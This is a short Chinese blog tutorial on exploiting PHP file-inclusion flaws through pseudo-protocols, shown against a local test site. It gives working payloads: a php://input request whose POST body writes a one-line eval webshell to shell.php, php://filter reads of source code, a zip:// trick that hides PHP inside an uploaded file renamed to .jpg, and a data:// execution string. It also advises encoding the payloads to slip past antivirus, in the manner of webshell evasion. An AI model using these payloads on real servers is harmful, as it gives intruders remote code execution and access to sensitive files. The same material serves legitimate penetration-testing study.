当前位置：网站首页>文件包含之伪协议的使用

文件包含之伪协议的使用

2022-08-03 14:51:00 【一青一柠】

http://127.0.0.1/include/03/index.php?page=php://input

然后要用post类型提交数据

这里可以这么提交：

<?php 
fputs(fopen("shell.php","w"),"<?php @eval(\$_POST["hack"])?>")
?>

这里通过直接写入一个木马文件，来进行攻击。

所以不只是文件上传点可以写入木马，php的input流也可以写入一句话木马。

?page=php://filter/read=convert.base64-encode/resource=index.php

?page=php://filter/convert.base64-encode/resource=index.php

通过指定末尾的文件，可以读取经base64编码后的文件源码，之后再base64解码一下就行。

虽然不能直接获取到shell等，但能读取敏感文件危害也是挺大的。

allow_url_include和allow_url fopen都不做要求，这是非常大的优势。

?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt

先将要执行的PHP代码写好文件名为test.txt，将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传，若不能便将test.zip重命名为test.jpg后再上传。、

注意，这里必须是绝对路径。

?file=data://text/plain,<?php phpinfo();?>

但在利用时有很多问题。

后面php代码容易被查杀，所以要灵活利用编码等方法，可以借鉴webshell免杀，原理都是一样的。

<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。

解决思路：

不写后面的 ?> 因为PHP里面其实不需要写后面的前面的；号就已经说明结束了。

如果没有；号就必须写 ?>作为结束。

版权声明
本文为[一青一柠]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_56438857/article/details/126052271